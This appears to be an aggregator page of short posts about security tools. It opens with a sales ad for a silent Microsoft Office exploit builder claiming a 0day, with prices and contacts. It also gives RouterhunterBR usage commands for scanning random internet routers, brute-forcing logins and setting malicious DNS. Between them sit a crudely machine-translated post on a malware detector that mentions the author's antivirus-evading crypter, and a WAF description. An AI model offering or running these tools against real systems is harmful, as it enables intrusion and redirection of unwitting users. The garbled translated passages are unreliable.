I Dont Sell ( CC, CVV, Bank Logins,WU Transfers, Paypal Ebay And Others Accounts, I am Pentester and Hacker Not Carder, Some N00bs use my name For Scam And Rip

Universal Silent Exploit Builder for Office: 2003, 2007, 2010, 2013
Windows: XP, Vista, 7, 8, 8.1, 10
Bits: 32-bit and 64-bit
This is SILENT! Not Macros.Based on https://www.cvedetails.com/cve/CVE-2015-2470/ , https://www.cvedetails.com/cve/CVE-2015-6172/ and another one, which is officially not documented on Microsoft base and not patched yet(0day).

Demonstration USEB on :

Windows 10 Pro 64bit and Office 2013(64bit):

Windows 8.1 64bit and Office 2013(32bit): 

Windows 7 64bit and Office 2013(32bit): 

Word: http://viruscheckmate.com/free/#/taskID/aq7Cx2BJmblC
Excel: http://viruscheckmate.com/free/#/taskID/OQZfGdPT48rT

1 month with automatic updates - 1200 USD (private stub 200 USD)
3 month with automatic updates (private stub 400USD) - 2400 USD. Discounts available.

Terms Of Service: 
1. You are not allowed to share/leak the product.
2. You are not allowed to resell the product.
3. You are not allowed to open exploit service based on my builder.
4. There are no refunds. All sales are final.
5. I am in no way responsible how you use this exploit.
6. Scanning it on Virus Distribution Sites will result in permanent ban.
7. I can change ToS any time I want.
8. By purchasing the product you accept this ToS.
9. About problems and questions you need to contact me on my Jabber writer@darkjabber.cc - z3r0@exploit.im - Yahoo internet.zer0@yahoo.com - Skype internet.zero
Read More


Read More

4n4lDetector v1.1

Fuck what fucking time ago out there!  Now it is the awkward moment when everyone is back to haunt you. If you get into bed and I enfold, raisins heat. If you poke a foot by the end of the sheet, you run the risk of losing the little freeze. If you come out on long pants, even gayumbos merge with the cheeks of your buttocks, and this with perspiration your balls become number one public enemy. Why you the start to sweat all! And if Instead decide to spend the shorts ... date by fucked because something bad has to happen to you, you listen to me ...  this is a no live!

The truth is that I do not want to write the post jajajaa pffffffff ... rather be thrown into the little sun on my terrace sucking flash pole , but as alternatives after a weekend so I was only movidito post something or enter Putalocura , and I know what will be happening, but lately not updated with good content, for that ... I'm losing interest.

So I said ... I will give them to the kids and especially the broads, the new version of my software 4n4lDetector. Jokes aside, I have devoted many hours to make it even more powerful than the previous version, and if I say that I am very happy with the results that this tool is giving me not deceived you. Also I do not have to sell you anything, because everything with me always is free.

What new things brings this version of 4n4lDetector?

If you recall my previous post in which I developed a Crypter to undetectable malware. This used a stub called enelpc.exe , which after use with 4n4lCrypter , the resulting file Crypt.exe finally transport the encrypted malware. This would result both executable dragging the tool.

I have included as are routine screening Droppers , which will work on applications of type Binder , Joiner and Crypters based on stubs .

Following the Crypters , one of the publications indetectables.net by the userMaggicianCOr , was further modified by himself. I decided to download it and use it to check out the encrypted binary, providing a good example to show other information you provide 4n4lDetector .

This new version is studying the possible abundance of strangers, usually randomly generated characters by malware, to include a polymorphism added to the descriptions of the binary generated. The following image shows a polymorphism detection, followed by the amount of code Dropper , and the anomaly after the Entry Point to find a conditional jump JPO , which betrays modification in Visual Basic 6 compiled executable.

If you remember the entry that cifrábamos malware hand rotation algorithms, addition, subtraction and instructions are included XOR after the Entry Point TrojanPoison Ivy . Which also draw the attention of 4n4lDetector and studying the first 25bytes of the starting point for all applications.

Something that could not miss in the execution module, would be the ability to load libraries. Bringing this new version has added a new executable only 2.7 KB , to study their Memory Dumps .

The algorithms responsible for finding executable names have also been improved, so now we have in this section a wider and better information obtained.

A user asked me to be kept in a log extractions, so I prepared a function console tool, where you are if passed as a parameter without quotes of any kind, the name of the executable to be analyzed, this generates a TXT at the root of 4n4lDetector with the name of the application being discussed.

I remember something that had never named in the blog, are the methods Call By Name API or API Call By Hash . These methods are used to invoke the API without declaring them as such. Using the hash algorithms as the name by which to refer to an API or are often call the functions directly loading bookstores with an estimatedLoadLibrary and copying of memory instructions. The malware can use these techniques to hide the static analysis, what are the features you actually use, so it seemed a good idea to incorporate the detection of these methods. The figure below shows a simple Downloader , camouflaging the API URLDownloadToFile .

Strange made me develop methods of antivirus evasion and malware as a hobby and in turn fight as a hobby lol

Read More

Raptor is an Open Source Tool, yout focus is study of attacks and find intelligent ways to block attacks.

Raptor is made in pure C, don’t use regex or other common ways to block attacks, yes is diferent and fast like a raptor dinosaur, Raptor follow principle KISS (Keep It Simple), you can use Raptor to simulate attacks and bypasses at wafs.

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use blacklist of IPs to block some users at config/blacklist ip.txt
  • You can use IPv6 and IPv4 at communications
  • At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
  • At the future SSL/TLS...

to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor


Up some HTTPd server at port 80 
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
you can test at http://localhost:8883/test.php

Look the docs



509 of attacks, detect and block 349, 68% of attacks blocked

Read More

The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware has the ability to change the DNS settings of our machine redirecting the user to sites with malicious purposesImagine for example that your system is infected with this malwarewhat might happen is that the user to access a particular site (eg.Facebook.commay be forwarded to an unsolicited website and potentially illegal.

The script explores four vulnerabilities in routers


import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime


  -range, --range  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1, --dns1                    Define malicious dns1
  -dns2, --dns2                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip


Random ips 
python routerhunter.py --dns1 --dns2 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 --dns2 -rip -lmtip 10 --threads 10
Scanner in range ip: 
python routerhunter.py --dns1 --dns2 --range --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.* 
python routerhunter.py --dns1 --dns2 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns - DSLink 260E.
python routerhunter.py --dns1 --dns2 --range --bruteforce --threads 10

Read More

AndroL4b is an android security virtual machine based on ubuntu Mate includes the collection of latest framework, tutorials and labs from different security geeks and researcher for reverse engineering and malware analysis.


Read More